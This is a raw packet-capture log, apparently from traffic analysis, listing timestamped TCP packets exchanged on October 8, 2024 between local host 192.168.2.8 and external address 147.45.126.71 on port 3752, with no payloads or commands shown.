Oct 8, 2024 20:52:31.645643950 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.645658016 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.645670891 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.645737886 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.645754099 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.645766973 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.645781994 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.645795107 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.645808935 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.645878077 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.645893097 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.645908117 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.645921946 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.646034956 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.646048069 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.646061897 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.646075964 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.646089077 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.646102905 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.646117926 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.648258924 CEST	49716	3752	192.168.2.8	147.45.126.71
Oct 8, 2024 20:52:31.648258924 CEST	49716	3752	192.168.2.8	147.45.126.71
Oct 8, 2024 20:52:31.648463011 CEST	49716	3752	192.168.2.8	147.45.126.71
Oct 8, 2024 20:52:31.648463011 CEST	49716	3752	192.168.2.8	147.45.126.71
Oct 8, 2024 20:52:31.652632952 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.652648926 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.652664900 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.652678013 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.652692080 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.652775049 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.652790070 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.652947903 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.652962923 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.652977943 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.652992010 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.653004885 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.653018951 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.653033018 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.653045893 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.653060913 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.653080940 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.653095961 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.653110027 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.653122902 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.653249025 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.653264999 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.653280020 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.653291941 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.653306961 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.653320074 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.653378010 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.653381109 CEST	49716	3752	192.168.2.8	147.45.126.71
Oct 8, 2024 20:52:31.653390884 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.653407097 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.653419971 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.653506041 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.653676987 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.653691053 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.653704882 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.653718948 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.653733015 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.653747082 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.653762102 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.653824091 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.653837919 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.654134035 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.654148102 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.654285908 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.654299021 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.654314995 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.654326916 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.654340982 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.654355049 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.654367924 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.654381037 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.654395103 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.654408932 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.654419899 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.659687042 CEST	49716	3752	192.168.2.8	147.45.126.71
Oct 8, 2024 20:52:31.663275003 CEST	49716	3752	192.168.2.8	147.45.126.71
Oct 8, 2024 20:52:31.663368940 CEST	49716	3752	192.168.2.8	147.45.126.71
Oct 8, 2024 20:52:31.663368940 CEST	49716	3752	192.168.2.8	147.45.126.71
Oct 8, 2024 20:52:31.663368940 CEST	49716	3752	192.168.2.8	147.45.126.71
Oct 8, 2024 20:52:31.729926109 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.729952097 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.729974031 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.729988098 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.730026960 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.730048895 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.730062962 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.730074883 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.730088949 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.730139017 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.730154037 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.730168104 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.730180979 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.730221987 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.730242968 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.730257034 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.730297089 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.730312109 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.730381012 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.730432034 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.730444908 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.730458021 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.731077909 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.731092930 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.731106997 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.731134892 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.731147051 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.731162071 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.731175900 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.731291056 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.731302977 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.731317043 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.731331110 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.731344938 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.731358051 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.731373072 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.731421947 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.731441975 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.731455088 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.731467962 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.731481075 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.731493950 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.731507063 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.731519938 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.731533051 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.731545925 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.731565952 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.731580973 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.731594086 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.731606960 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.731620073 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.731632948 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.731646061 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.731666088 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.731678963 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.731921911 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.731935024 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.731956005 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.731969118 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.732059956 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.732074022 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.732088089 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.732100964 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.732115030 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.732127905 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.732286930 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.732300997 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.732315063 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.732336044 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.732350111 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.732363939 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.732378006 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.732415915 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.732429028 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.732443094 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.732456923 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.732566118 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.732578993 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.732594013 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.732606888 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.732620001 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.732635021 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.732647896 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.732924938 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.733056068 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.733071089 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.733086109 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.733099937 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.733113050 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.733127117 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.733149052 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.733164072 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.733176947 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.733190060 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.733203888 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.733217955 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.733231068 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.733244896 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.733259916 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.737365007 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.737379074 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.737392902 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.737415075 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.737428904 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.737442970 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.737456083 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.737474918 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.737488985 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.737503052 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.737515926 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.737529039 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.737668037 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.737725973 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.744048119 CEST	49716	3752	192.168.2.8	147.45.126.71
Oct 8, 2024 20:52:31.744364977 CEST	49716	3752	192.168.2.8	147.45.126.71
Oct 8, 2024 20:52:31.744364977 CEST	49716	3752	192.168.2.8	147.45.126.71
Oct 8, 2024 20:52:31.744463921 CEST	49716	3752	192.168.2.8	147.45.126.71
Oct 8, 2024 20:52:31.744463921 CEST	49716	3752	192.168.2.8	147.45.126.71
Oct 8, 2024 20:52:31.744463921 CEST	49716	3752	192.168.2.8	147.45.126.71
Oct 8, 2024 20:52:31.744503021 CEST	49716	3752	192.168.2.8	147.45.126.71
Oct 8, 2024 20:52:31.744532108 CEST	49716	3752	192.168.2.8	147.45.126.71
Oct 8, 2024 20:52:31.744532108 CEST	49716	3752	192.168.2.8	147.45.126.71
Oct 8, 2024 20:52:31.744532108 CEST	49716	3752	192.168.2.8	147.45.126.71
Oct 8, 2024 20:52:31.744664907 CEST	49716	3752	192.168.2.8	147.45.126.71
Oct 8, 2024 20:52:31.744664907 CEST	49716	3752	192.168.2.8	147.45.126.71
Oct 8, 2024 20:52:31.745805025 CEST	49716	3752	192.168.2.8	147.45.126.71
Oct 8, 2024 20:52:31.745873928 CEST	49716	3752	192.168.2.8	147.45.126.71
Oct 8, 2024 20:52:31.823776007 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.823791981 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.823806047 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.823820114 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.823915958 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.823929071 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.823945045 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.823960066 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.823976040 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.824366093 CEST	49716	3752	192.168.2.8	147.45.126.71
Oct 8, 2024 20:52:31.824485064 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.824497938 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.824511051 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.824525118 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.824538946 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.824552059 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.824563980 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.824575901 CEST	49716	3752	192.168.2.8	147.45.126.71
Oct 8, 2024 20:52:31.824577093 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.824589968 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.824600935 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.824615955 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.824629068 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.824641943 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.824656963 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.825233936 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.825248003 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.825262070 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.825274944 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.825288057 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.825301886 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.825314045 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.825328112 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.825341940 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.825356007 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.825376034 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.825388908 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.825402975 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.825414896 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.825428009 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.825443029 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.825455904 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.825468063 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.825480938 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.825505972 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.825517893 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.825531006 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.825542927 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.825556993 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.825570107 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.825582027 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.825594902 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.825608015 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.825620890 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.825634003 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.825647116 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.825661898 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.826107025 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.826121092 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.826137066 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.826149940 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.826163054 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.826263905 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.826280117 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.826301098 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.826338053 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.826351881 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.826365948 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.826378107 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.826390982 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.826404095 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.826416969 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.826431036 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.826443911 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.826463938 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.826477051 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.826489925 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.826503038 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.826515913 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.826530933 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.826545954 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.826559067 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.826570988 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.826585054 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.826597929 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.826612949 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.827038050 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.827058077 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.827071905 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.827085972 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.827099085 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.827111006 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.827124119 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.827136993 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.827150106 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.827164888 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.827178001 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.827189922 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.827198982 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.827212095 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.827227116 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.827239990 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.827251911 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.827265978 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.827997923 CEST	49716	3752	192.168.2.8	147.45.126.71
Oct 8, 2024 20:52:31.828038931 CEST	49716	3752	192.168.2.8	147.45.126.71
Oct 8, 2024 20:52:31.828080893 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.828104019 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.828116894 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.828130960 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.828142881 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.828155994 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.828169107 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.828181028 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.828195095 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.828207970 CEST	3752	49716	147.45.126.71	192.168.2.8
